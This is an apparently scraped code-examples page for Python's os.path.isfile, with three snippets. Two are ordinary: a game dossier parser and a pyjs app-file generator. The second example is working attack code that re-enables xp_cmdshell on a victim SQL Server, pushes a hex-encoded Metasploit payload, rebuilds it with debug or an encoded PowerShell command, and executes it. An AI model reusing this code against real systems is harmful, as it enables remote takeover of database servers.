os.path.isfile

Here are examples of the Python API os.path.isfile, taken from open source projects. By voting up, you can indicate which examples are most useful and appropriate.

200 Examples
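
Before the examples, a minimal sketch of the call's semantics: os.path.isfile returns True only for an existing regular file (following symlinks), and False for directories, broken symlinks, and missing paths. The temporary file below is illustrative only.

import os
import tempfile

with tempfile.NamedTemporaryFile() as tmp:
    print(os.path.isfile(tmp.name))                   # True: an existing regular file
    print(os.path.isfile(os.path.dirname(tmp.name)))  # False: a directory
print(os.path.isfile(tmp.name))                       # False: the file no longer exists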

Example 1

def main():
	
	import struct, json, time, sys, os, shutil, datetime, base64

	parserversion = "0.9.12.0"
	
	global rawdata, tupledata, data, structures, numoffrags
	global filename_source, filename_target
	global option_server, option_format, option_tanks
	
	filename_source = ""
	option_raw = 0
	option_format = 0
	option_server = 0
	option_frags = 1
	option_tanks = 0
	
	for argument in sys.argv[1:]:
		if argument == "-s":
			option_server = 1
			#print '-- SERVER mode enabled'
		elif argument == "-r":
			option_raw = 1
			#print '-- RAW mode enabled'
		elif argument == "-f":
			option_format = 1
			#print '-- FORMAT mode enabled'
		elif argument == "-k":
			option_frags = 0
			#print '-- FRAGS will be excluded'
		elif argument == "-t":
			option_tanks = 1
			#print '-- TANK info will be included'
		else:
			# dossier file, if more than one get only first
			if filename_source == '' and os.path.isfile(argument):
				filename_source = argument
	
	if filename_source == "":
		usage()
		sys.exit(2)
		
	printmessage('############################################')
	printmessage('###### WoTDC2J ' + parserversion)
	

	printmessage('Processing ' + filename_source)
	

	if not os.path.exists(filename_source) or not os.path.isfile(filename_source) or not os.access(filename_source, os.R_OK):
		catch_fatal('Dossier file does not exist')
		sys.exit(1)

	if os.path.getsize(filename_source) == 0:
		catch_fatal('Dossier file size is zero')
		sys.exit(1)
		
	filename_target = os.path.splitext(filename_source)[0]
	filename_target = filename_target + '.json'

	if os.path.exists(filename_target) and os.path.isfile(filename_target) and os.access(filename_target, os.R_OK):
		try:
			os.remove(filename_target)
		except:
			catch_fatal('Cannot remove target file ' + filename_target)

			
	cachefile = open(filename_source, 'rb')

	try:
		from SafeUnpickler import SafeUnpickler
		dossierversion, dossierCache = SafeUnpickler.load(cachefile)
	except Exception, e:
		exitwitherror('Dossier cannot be read (pickle could not be read) ' + e.message)

	if not 'dossierCache' in locals():
		exitwitherror('Dossier cannot be read (dossierCache does not exist)')

	printmessage("Dossier version " + str(dossierversion))
	
	tankitems = [(k, v) for k, v in dossierCache.items()]

	dossier = dict()
		
	dossierheader = dict()
	dossierheader['dossierversion'] = str(dossierversion)
	dossierheader['parser'] = 'http://www.vbaddict.net'
	dossierheader['parserversion'] = parserversion
	dossierheader['tankcount'] = len(tankitems)
	

	
	base32name = "?;?"
	if option_server == 0:
		filename_base = os.path.splitext(os.path.basename(filename_source))[0]
		try:
			base32name = base64.b32decode(filename_base)
		except Exception, e:
			pass
			#printmessage('cannot decode filename ' + filename_base + ': ' + e.message)


	dossierheader['server'] = base32name.split(';', 1)[0]
	dossierheader['username'] = base32name.split(';', 1)[1]
	
	
	if option_server == 0:
		dossierheader['date'] = time.mktime(time.localtime())
	
	tanksdata = load_tanksdata()
	structures = load_structures()
	
	tanks = dict()
	tanks_v2 = dict()
	
	battleCount_15 = 0
	battleCount_7 = 0
	battleCount_historical = 0
	battleCount_company = 0
	battleCount_clan = 0
	battleCount_fortBattles = 0
	battleCount_fortSorties = 0
	battleCount_rated7x7 = 0
	battleCount_globalMap = 0
	battleCount_fallout = 0
	
	for tankitem in tankitems:
		
		if len(tankitem) < 2:
			printmessage('Invalid tankdata')
			continue

		if len(tankitem[0]) < 2:
			printmessage('Invalid tankdata')
			continue
			
		rawdata = dict()
		
		try:
			data = tankitem[1][1]
		except Exception, e:
			printmessage('Invalid tankitem ' + str(e.message))
			continue
			
		tankstruct = str(len(data)) + 'B'
		tupledata = struct.unpack(tankstruct, data)
		tankversion = getdata("tankversion", 0, 1)
		
		#if tankversion != 87:
		#printmessage("Tankversion " + str(tankversion))
		#	continue
		
		if tankversion not in structures:
			write_to_log('unsupported tankversion ' + str(tankversion))
			continue				

		if not isinstance(tankitem[0][1], (int)):
			printmessage('Invalid tankdata')
			continue
	
		try:
			tankid = tankitem[0][1] >> 8 & 65535
		except Exception, e:
			printmessage('cannot get tankid ' + e.message)
			continue
						
		try:
			countryid = tankitem[0][1] >> 4 & 15
		except Exception, e:
			printmessage('cannot get countryid ' + e.message)
			continue
			
		#For debugging purposes
		#if not (countryid==4 and tankid==19):
		#	continue
		
		for m in xrange(0,len(tupledata)):
			rawdata[m] = tupledata[m]
		
		if len(tupledata) == 0:
			continue

		if option_server == 0:
			tanktitle = get_tank_data(tanksdata, countryid, tankid, "title")
		else:
			tanktitle = str(countryid) + '_' + str(tankid)

		fragslist = []
		if tankversion >= 65:
			tank_v2 = dict()
			
			if tankversion == 65:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7')
				
			if tankversion == 69:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7')

			if tankversion == 77:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical')

			if tankversion == 81:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements')

			if tankversion in [85, 87]:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements', 'singleAchievements', 'clanAchievements')

			if tankversion in [88,89]:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7')

			if tankversion == 92:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon', 'maxGlobalMapCommon')
			
			if tankversion == 94:
				blocks = ('a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7', 'achievements', 'frags', 'total', 'max15x15', 'max7x7', 'playerInscriptions', 'playerEmblems', 'camouflages', 'compensation', 'achievements7x7', 'historical', 'maxHistorical', 'historicalAchievements', 'fortBattles', 'maxFortBattles', 'fortSorties', 'maxFortSorties', 'fortAchievements', 'singleAchievements', 'clanAchievements', 'rated7x7', 'maxRated7x7', 'globalMapCommon', 'maxGlobalMapCommon', 'fallout', 'maxFallout', 'falloutAchievements')
				
			blockcount = len(list(blocks))+1

			newbaseoffset = (blockcount * 2)
			header = struct.unpack_from('<' + 'H' * blockcount, data)
			blocksizes = list(header[1:])
			blocknumber = 0
			numoffrags_list = 0
			numoffrags_a15x15 = 0
			numoffrags_a7x7 = 0
			numoffrags_historical = 0
			numoffrags_fortBattles = 0
			numoffrags_fortSorties = 0
			numoffrags_rated7x7 = 0
			numoffrags_globalMap = 0
			numoffrags_fallout = 0

			for blockname in blocks:

				if blocksizes[blocknumber] > 0:
					if blockname == 'frags':
						if option_frags == 1:
							fmt = '<' + 'IH' * (blocksizes[blocknumber]/6)
							fragsdata = struct.unpack_from(fmt, data, newbaseoffset)
							index = 0

							for i in xrange((blocksizes[blocknumber]/6)):
								compDescr, amount = (fragsdata[index], fragsdata[index + 1])
								numoffrags_list += amount	
								frag_countryid, frag_tankid, frag_tanktitle = get_tank_details(compDescr, tanksdata)
								tankfrag = [frag_countryid, frag_tankid, amount, frag_tanktitle]
								fragslist.append(tankfrag)
								index += 2							

							for i in xrange((blocksizes[blocknumber])):
								rawdata[newbaseoffset+i] = str(tupledata[newbaseoffset+i]) + " / Frags"
								
							tank_v2['fragslist'] = fragslist
				
						newbaseoffset += blocksizes[blocknumber] 

						
					else:
						oldbaseoffset = newbaseoffset
						structureddata = getstructureddata(blockname, tankversion, newbaseoffset)
						structureddata = keepCompatibility(structureddata)
						newbaseoffset = oldbaseoffset+blocksizes[blocknumber]
						tank_v2[blockname] = structureddata 

				blocknumber +=1
			if contains_block('max15x15', tank_v2):
				if 'maxXP' in tank_v2['max15x15']:
					if tank_v2['max15x15']['maxXP']==0:
						tank_v2['max15x15']['maxXP'] = 1
						
				if 'maxFrags' in tank_v2['max15x15']:
					if tank_v2['max15x15']['maxFrags']==0:
						tank_v2['max15x15']['maxFrags'] = 1

				
			if contains_block('company', tank_v2):
				if 'battlesCount' in tank_v2['company']:
					battleCount_company += tank_v2['company']['battlesCount']
			
			if contains_block('clan', tank_v2):
				if 'battlesCount' in tank_v2['clan']:
					battleCount_clan += tank_v2['clan']['battlesCount']

			if contains_block('a15x15', tank_v2):
				
				if 'battlesCount' in tank_v2['a15x15']:
					battleCount_15 += tank_v2['a15x15']['battlesCount']
					
				if 'frags' in tank_v2['a15x15']:
					numoffrags_a15x15 = int(tank_v2['a15x15']['frags'])

			if contains_block('a7x7', tank_v2):
				
				if 'battlesCount' in tank_v2['a7x7']:
					battleCount_7 += tank_v2['a7x7']['battlesCount']
				
				if 'frags' in tank_v2['a7x7']:
					numoffrags_a7x7 = int(tank_v2['a7x7']['frags'])
			
			if contains_block('historical', tank_v2):
				
				if 'battlesCount' in tank_v2['historical']:
					battleCount_historical += tank_v2['historical']['battlesCount']
				
				if 'frags' in tank_v2['historical']:
					numoffrags_historical = int(tank_v2['historical']['frags'])

			if contains_block('fortBattles', tank_v2):
				
				if 'battlesCount' in tank_v2['fortBattles']:
					battleCount_fortBattles += tank_v2['fortBattles']['battlesCount']
				
				if 'frags' in tank_v2['fortBattles']:
					numoffrags_fortBattles = int(tank_v2['fortBattles']['frags'])
					
			if contains_block('fortSorties', tank_v2):
				
				if 'battlesCount' in tank_v2['fortSorties']:
					battleCount_fortSorties += tank_v2['fortSorties']['battlesCount']
				
				if 'frags' in tank_v2['fortSorties']:
					numoffrags_fortSorties = int(tank_v2['fortSorties']['frags'])

			if contains_block('rated7x7', tank_v2):
				
				if 'battlesCount' in tank_v2['rated7x7']:
					battleCount_rated7x7 += tank_v2['rated7x7']['battlesCount']
				
				if 'frags' in tank_v2['rated7x7']:
					numoffrags_rated7x7 = int(tank_v2['rated7x7']['frags'])
					
			if contains_block('globalMapCommon', tank_v2):
				
				if 'battlesCount' in tank_v2['globalMapCommon']:
					battleCount_globalMap += tank_v2['globalMapCommon']['battlesCount']
				
				if 'frags' in tank_v2['globalMapCommon']:
					numoffrags_globalMap = int(tank_v2['globalMapCommon']['frags'])
				
			if contains_block('fallout', tank_v2):
				
				if 'battlesCount' in tank_v2['fallout']:
					battleCount_fallout += tank_v2['fallout']['battlesCount']
				
				if 'frags' in tank_v2['fallout']:
					numoffrags_fallout = int(tank_v2['fallout']['frags'])
				
			if option_frags == 1:

				try:
					if numoffrags_list != (numoffrags_a15x15 + numoffrags_a7x7 + numoffrags_historical + numoffrags_fortBattles + numoffrags_fortSorties + numoffrags_rated7x7 + numoffrags_globalMap + numoffrags_fallout):
						pass
						#write_to_log('Wrong number of frags for ' + str(tanktitle) + ', ' + str(tankversion) + ': ' + str(numoffrags_list) + ' = ' + str(numoffrags_a15x15) + ' + ' + str(numoffrags_a7x7) + ' + ' + str(numoffrags_historical) + ' + ' + str(numoffrags_fortBattles) + ' + ' + str(numoffrags_fortSorties) + ' + ' + str(numoffrags_rated7x7))
				except Exception, e:
						write_to_log('Error processing frags: ' + e.message)
		
			
				
			tank_v2['common'] = {"countryid": countryid,
				"tankid": tankid,
				"tanktitle": tanktitle,
				"compactDescr": tankitem[0][1],
				"type": get_tank_data(tanksdata, countryid, tankid, "type"),
				"premium": get_tank_data(tanksdata, countryid, tankid, "premium"),
				"tier": get_tank_data(tanksdata, countryid, tankid, "tier"),
				"updated": tankitem[1][0],
				"updatedR": datetime.datetime.fromtimestamp(int(tankitem[1][0])).strftime('%Y-%m-%d %H:%M:%S'),
				"creationTime": tank_v2['total']['creationTime'],
				"creationTimeR": datetime.datetime.fromtimestamp(int(tank_v2['total']['creationTime'])).strftime('%Y-%m-%d %H:%M:%S'),
				"lastBattleTime": tank_v2['total']['lastBattleTime'],
				"lastBattleTimeR": datetime.datetime.fromtimestamp(int(tank_v2['total']['lastBattleTime'])).strftime('%Y-%m-%d %H:%M:%S'),
				"basedonversion": tankversion,
				"frags":  numoffrags_a15x15,
				"frags_7x7":  numoffrags_a7x7,
				"frags_historical":  numoffrags_historical,
				"frags_fortBattles":  numoffrags_fortBattles,
				"frags_fortSorties":  numoffrags_fortSorties,
				"frags_compare": numoffrags_list,
				"has_15x15": contains_block("a15x15", tank_v2),
				"has_7x7": contains_block("a7x7", tank_v2),
				"has_historical": contains_block("historical", tank_v2),
				"has_clan": contains_block("clan", tank_v2),
				"has_company": contains_block("company", tank_v2),
				"has_fort": contains_block("fortBattles", tank_v2),
				"has_sortie": contains_block("fortSorties", tank_v2)
				
			}
			
			if option_raw == 1:
				tank_v2['rawdata'] = rawdata

			tanks_v2[tanktitle] = tank_v2
			
			
		if tankversion < 65:
			if tankversion >= 20:
				company = getstructureddata("company", tankversion)
				battleCount_company += company['battlesCount']
				clan = getstructureddata("clan", tankversion)
				battleCount_clan += clan['battlesCount']
			
			numoffrags = 0
	
			structure = getstructureddata("structure", tankversion)


			
			if 'fragspos' not in structure:
				write_to_log('tankversion ' + str(tankversion) + ' not in JSON')
				continue
			
			if option_frags == 1 and tankversion >= 17:
				fragslist = getdata_fragslist(tankversion, tanksdata, structure['fragspos'])
	
			tankdata = getstructureddata("tankdata", tankversion)
			battleCount_15 += tankdata['battlesCount']
	
			if not "creationTime" in tankdata:
				tankdata['creationTime'] = 1356998400
	
			common = {"countryid": countryid,
				"tankid": tankid,
				"tanktitle": tanktitle,
				"compactDescr": tankitem[0][1],
				"type": get_tank_data(tanksdata, countryid, tankid, "type"),
				"premium": get_tank_data(tanksdata, countryid, tankid, "premium"),
				"tier": get_tank_data(tanksdata, countryid, tankid, "tier"),
				"updated": tankitem[1][0],
				"updatedR": datetime.datetime.fromtimestamp(int(tankitem[1][0])).strftime('%Y-%m-%d %H:%M:%S'),
				"creationTime": tankdata['creationTime'],
				"creationTimeR": datetime.datetime.fromtimestamp(int(tankdata['creationTime'])).strftime('%Y-%m-%d %H:%M:%S'),
				"lastBattleTime": tankdata['lastBattleTime'],
				"lastBattleTimeR": datetime.datetime.fromtimestamp(int(tankdata['lastBattleTime'])).strftime('%Y-%m-%d %H:%M:%S'),
				"basedonversion": tankversion,
				"frags": tankdata['frags'],
				"frags_compare": numoffrags
			}
	
			if option_frags == 1 and tankversion >= 17:
				try:
					if tankdata['frags'] != numoffrags:
						printmessage('Wrong number of frags!')
				except Exception, e:
						write_to_log('Error processing frags: ' + e.message)
	
			series = getstructureddata("series", tankversion)
	
			special = getstructureddata("special", tankversion)
	
			battle = getstructureddata("battle", tankversion)
	
			major = getstructureddata("major", tankversion)
	
			epic = getstructureddata("epic", tankversion)
	
	
	
			tank = dict()
			
			tank['tankdata'] = tankdata
			tank['common'] = common
	
			if tankversion >= 20:
				tank['series'] = series
				tank['battle'] = battle
				tank['special'] = special
				tank['epic'] = epic
				tank['major'] = major
				tank['clan'] = clan
				tank['company'] = company
				
			if option_frags == 1:
				tank['kills'] = fragslist
			
			if option_raw == 1:
				tank['rawdata'] = rawdata
			
			tanks[tanktitle] = tank
			#tanks = sorted(tanks.values())

	
	dossierheader['battleCount_15'] = battleCount_15	
	dossierheader['battleCount_7'] = battleCount_7
	dossierheader['battleCount_historical'] = battleCount_historical
	dossierheader['battleCount_company'] = battleCount_company
	dossierheader['battleCount_clan'] = battleCount_clan

	dossierheader['result'] = "ok"
	dossierheader['message'] = "ok"
	
	dossier['header'] = dossierheader
	dossier['tanks'] = tanks
	dossier['tanks_v2'] = tanks_v2

	dumpjson(dossier)

	printmessage('###### Done!')
	printmessage('')
	sys.exit(0)
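
Example 1 guards its input with three checks (os.path.exists, os.path.isfile, os.access) plus a size check before parsing. A standalone sketch of that pattern, with a hypothetical check_readable_file() helper:

import os
import sys

def check_readable_file(path):
    # Mirror Example 1: reject missing paths, non-files, unreadable files, and empty files.
    if not os.path.exists(path) or not os.path.isfile(path) or not os.access(path, os.R_OK):
        return False
    return os.path.getsize(path) > 0

if __name__ == '__main__':
    if len(sys.argv) < 2 or not check_readable_file(sys.argv[1]):
        sys.exit('usage: check.py <readable, non-empty file>')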

Example 2

Project: pwn_plug_sources
Source File: mssql.py
def deploy_hex2binary(ipaddr,port,username,password,option):
	# connect to SQL server
	target_server = _mssql.connect(ipaddr + ":" + str(port), username, password)
	setcore.PrintStatus("Connection established with SQL Server...")
	setcore.PrintStatus("Converting payload to hexadecimal...")
	# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
	if os.path.isfile("src/program_junk/set.payload"):
		web_path = ("src/program_junk/web_clone/")
	# then we are using metasploit
	if not os.path.isfile("src/program_junk/set.payload"):
                if operating_system == "posix":
                        web_path = ("src/program_junk")
                        subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
                        subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
	fileopen = file("%s/msf.exe" % (web_path), "rb")
	# read in the binary
	data = fileopen.read()
	# convert the binary to hex
	data = binascii.hexlify(data)
	# we write out binary out to a file
	filewrite = file("src/program_junk/payload.hex", "w")
	filewrite.write(data)
	filewrite.close()

	# if we are using metasploit, start the listener
	if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
                if operating_system == "posix":
                        import pexpect
        		meta_path = setcore.meta_path()
                	setcore.PrintStatus("Starting the Metasploit listener...")
                        child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path))

	# random executable name
	random_exe = setcore.generate_random_string(10,15)

	#
	# next we deploy our hex to binary if we selected option 1 (powershell)
	#

	if option == "1":
		# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
		powershell_command = unicode("$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)" % (random_exe,random_exe))
	
		########################################################################################################################################################################################################
		#
		# there is an odd quirk with Python and unicode: PowerShell's EncodedCommand expects UTF-16LE, which places a null byte after each ASCII character, but Python's plain string does not, so the encoded command becomes corrupt
		# to get around this, a null byte is appended after each character so the EncodedCommand works properly
		#
		########################################################################################################################################################################################################

		# blank command will store our fixed unicode variable
		blank_command = ""
		# loop through each character and insert null byte
		for char in powershell_command:
			# insert the nullbyte
			blank_command += char + "\x00"

		# assign powershell command as the new one
		powershell_command = blank_command
		# base64 encode the powershell command
		powershell_command = base64.b64encode(powershell_command)
		# this will trigger when we are ready to convert

	#
	# next we deploy our hex to binary if we selected option 2 (debug)
	#
	if option == "2":
		setcore.PrintStatus("Attempting to re-enable the xp_cmdshell stored procedure if disabled..")
		# reconfigure the stored procedure and re-enable
                try:
        		target_server.execute_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
	        	# need to do it a second time for some reason on 2005
		        target_server.execute_query("RECONFIGURE;")
                except: pass
		# we selected hex to binary
		fileopen = file("src/payloads/hex2binary.payload", "r")
		# specify random filename for deployment
		setcore.PrintStatus("Deploying initial debug stager to the system.")
		random_file = setcore.generate_random_string(10,15)
		for line in fileopen:
			# remove bogus chars
			line = line.rstrip()
			# make it printer friendly to screen
			print_line = line.replace("echo e", "")
			setcore.PrintStatus("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC)
			target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file))
		setcore.PrintStatus("Converting the stager to a binary...")
		# here we convert it to a binary
		target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
		setcore.PrintStatus("Conversion complete. Cleaning up...")
		# delete the random file
		target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))

	# here we start the conversion and execute the payload

	setcore.PrintStatus("Sending the main payload via to be converted back to a binary.")
	# read in the file 900 bytes at a time
	fileopen = file("src/program_junk/payload.hex", "r")
	#random_exe = setcore.generate_random_string(10,15)
	while fileopen:
		data = fileopen.read(900).rstrip()
		# if data is done then break out of loop because file is over
		if data == "": break			
		setcore.PrintStatus("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n")
		target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
	setcore.PrintStatus("Delivery complete. Converting hex back to binary format.")

	# if we are using debug conversion then convert our binary
	if option == "2":
		target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
		target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe))
		# clean up the old files
		setcore.PrintStatus("Cleaning up old files..")
		target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))

	# if we are using SET payload
	if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):	   
		setcore.PrintStatus("Spawning seperate child process for listener...")
                try: shutil.copyfile("src/program_junk/web_clone/x", definepath)
        	except: pass
        	
		# start a threaded webserver in the background
		#import src.html.fasttrack_http_server
		subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
		#child1 = pexpect.spawn("python src/html/fasttrack_http_server.py")
		# grab the port options
		if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
			fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
			port = fileopen.read().rstrip()
		# if for some reason the port didn't get created, we default to 443
		if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port = "443" # default 443
		# launch the python listener through pexpect
		# need to change the directory real quick
		os.chdir(definepath)
		#child2 = pexpect.spawn("python src/payloads/set_payloads/listener.py %s" % (port))
		# now back 
		os.chdir("src/program_junk/web_clone/")

	setcore.PrintStatus("Triggering payload stager...")
	# a thread is needed here because the connection does not always terminate; it hangs if a thread isn't used
	import thread
	# execute the payload
	# we append more commands if option 1 is used
	if option == "1":
		random_exe_execute = random_exe
		random_exe = "powershell -EncodedCommand " + powershell_command

	sql_command = ("xp_cmdshell '%s'" % (random_exe))
	# start thread of SQL command that executes payload
	thread.start_new_thread(target_server.execute_query, (sql_command,))
	#time.sleep(5)
	time.sleep(1)
	# trigger the exe if option 1 is used
	if option == "1":
		sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
		thread.start_new_thread(target_server.execute_query, (sql_command,))
	# if pexpect doesn't exit cleanly, it freaks out
	if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
        	os.system("python ../../payloads/set_payloads/listener.py")
	try:
		# interact with the child process through pexpect
		child2.interact()
		try:
        		os.remove("x")
        	except: pass
	except: pass
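
Throughout Example 2, os.path.isfile acts as a mode switch: the mere presence of a marker file (src/program_junk/set.payload) selects the SET-payload code paths, without the file ever being read. A reduced sketch of that idiom, reusing the example's project-specific marker path:

import os

MARKER = "src/program_junk/set.payload"

def pick_web_path():
    # Presence of the marker selects the SET payload layout; absence implies Metasploit.
    if os.path.isfile(MARKER):
        return "src/program_junk/web_clone/"
    return "src/program_junk"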

Example 3

Project: pyjs
Source File: browser.py
    def _generate_app_file(self, platform):
        # TODO: cache busting
        template = self.read_boilerplate('all.cache.html')
        name_parts = [self.top_module, platform, 'cache.html']
        done = self.done[platform]
        len_ouput_dir = len(self.output)+1

        app_name = self.top_module
        platform_name = platform.lower()
        dynamic = 0,
        app_headers = ''
        available_modules = self.unique_list_values(self.visited_modules[platform])
        early_static_app_libs = [] + self.early_static_app_libs
        static_app_libs = []
        dynamic_app_libs = []
        dynamic_js_libs = [] + self.dynamic_js_libs
        static_js_libs = [] + self.static_js_libs
        early_static_js_libs = [] + self.early_static_js_libs
        late_static_js_libs = [] + self.late_static_js_libs
        dynamic_modules = []
        not_unlinked_modules = [re.compile(m[1:]) for m in self.unlinked_modules if m[0] == '!']
        for m in required_modules:
            not_unlinked_modules.append(re.compile('^%s$' % m))
        unlinked_modules = [re.compile(m) for m in self.unlinked_modules if m[0] != '!' and m not in not_unlinked_modules]

        def static_code(libs, msg = None):
            code = []
            for lib in libs:
                fname = lib
                if not os.path.isfile(fname):
                    fname = os.path.join(self.output, lib)
                if not os.path.isfile(fname):
                    raise RuntimeError('File not found %r' % lib)
                if fname[len_ouput_dir:] == self.output:
                    name = fname[len_ouput_dir:]
                else:
                    name = os.path.basename(lib)
                code.append('<script type="text/javascript"><!--')
                if not msg is None:
                    code.append("/* start %s: %s */" % (msg, name))
                f = file(fname)
                code.append(f.read())
                if not msg is None:
                    code.append("/* end %s */" % (name,))
                code.append("""--></script>""")
                self.remove_files[fname] = True
                fname = fname.split('.')
                if fname[-2] == '__%s__' % platform_name:
                    del fname[-2]
                    fname = '.'.join(fname)
                    if os.path.isfile(fname):
                        self.remove_files[fname] = True
            return "\n".join(code)

        def js_modname(path):
            return '[email protected]'+os.path.basename(path)+'.'+md5(path).hexdigest()

        def skip_unlinked(lst):
            new_lst = []
            pltfrm = '__%s__' % platform_name
            for path in lst:
                fname = os.path.basename(path).rpartition(pyjs.MOD_SUFFIX)[0]
                frags = fname.split('.')
                # TODO: do not combine module chunks until we write the file
                if self.cache_buster and len(frags[-1])==32 and len(frags[-1].strip('0123456789abcdef'))==0:
                    frags.pop()
                if frags[-1] == pltfrm:
                    frags.pop()
                fname = '.'.join(frags)
                in_not_unlinked_modules = False
                for m in not_unlinked_modules:
                    if m.match(fname):
                        in_not_unlinked_modules = True
                        new_lst.append(path)
                        break
                if not in_not_unlinked_modules:
                    in_unlinked_modules = False
                    for m in unlinked_modules:
                        if m.match(fname):
                            in_unlinked_modules = True
                            if fname in available_modules:
                                available_modules.remove(fname)
                    if not in_unlinked_modules:
                        new_lst.append(path)
            return new_lst

        if self.multi_file:
            dynamic_js_libs = self.unique_list_values(dynamic_js_libs + [m for m in list(self.js_libs) if not m in static_js_libs])
            dynamic_app_libs = self.unique_list_values([m for m in done if not m in early_static_app_libs])
        else:
            static_js_libs = self.unique_list_values(static_js_libs + [m for m in list(self.js_libs) if not m in dynamic_js_libs])
            static_app_libs = self.unique_list_values([m for m in done if not m in early_static_app_libs])

        dynamic_js_libs = skip_unlinked(dynamic_js_libs)
        dynamic_app_libs = skip_unlinked(dynamic_app_libs)
        static_js_libs = skip_unlinked(static_js_libs)
        static_app_libs = skip_unlinked(static_app_libs)

        dynamic_modules = self.unique_list_values(available_modules + [js_modname(lib) for lib in dynamic_js_libs])
        available_modules = self.unique_list_values(available_modules + early_static_app_libs + dynamic_modules)
        if len(dynamic_modules) > 0:
            dynamic_modules = "['" + "','".join(dynamic_modules) + "']"
        else:
            dynamic_modules = "[]"
        appscript = "<script><!--\n$wnd['__pygwt_modController']['init']($pyjs['appname'], window)\n$wnd['__pygwt_modController']['load']($pyjs['appname'], [\n'%s'\n])\n--></script>"
        jsscript = """<script type="text/javascript" src="%(path)s" onload="$pyjs['script_onload']('%(modname)s')" onreadystatechange="$pyjs['script_onreadystate']('%(modname)s')"></script>"""
        dynamic_app_libs = appscript % "',\n'".join([lib[len_ouput_dir:].replace('\\', '/') for lib in dynamic_app_libs])
        dynamic_js_libs = '\n'.join([jsscript % {'path': lib, 'modname': js_modname(lib)} for lib in dynamic_js_libs])
        early_static_app_libs = static_code(early_static_app_libs)
        static_app_libs = static_code(static_app_libs)
        early_static_js_libs = static_code(early_static_js_libs, "javascript lib")
        static_js_libs = static_code(static_js_libs, "javascript lib")
        late_static_js_libs = static_code(late_static_js_libs, "javascript lib")

        setoptions = "\n".join([("$pyjs['options']['%s'] = %s;" % (n, v)).lower() for n,v in self.runtime_options])

        file_contents = template % locals()
        if self.cache_buster:
            md5sum = md5(file_contents).hexdigest()
            name_parts.insert(2, md5sum)
        out_path = os.path.join(self.output, '.'.join((name_parts)))

        out_file = file(out_path, 'w')
        out_file.write(file_contents)
        out_file.close()
        return out_path
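
In static_code() above, each library is resolved in two steps: try the path as given, then retry relative to the output directory, and raise only after both os.path.isfile probes fail. That resolution logic in isolation (resolve_lib() is a hypothetical name):

import os

def resolve_lib(lib, output_dir):
    # Try the path as given, then fall back to the output directory.
    fname = lib
    if not os.path.isfile(fname):
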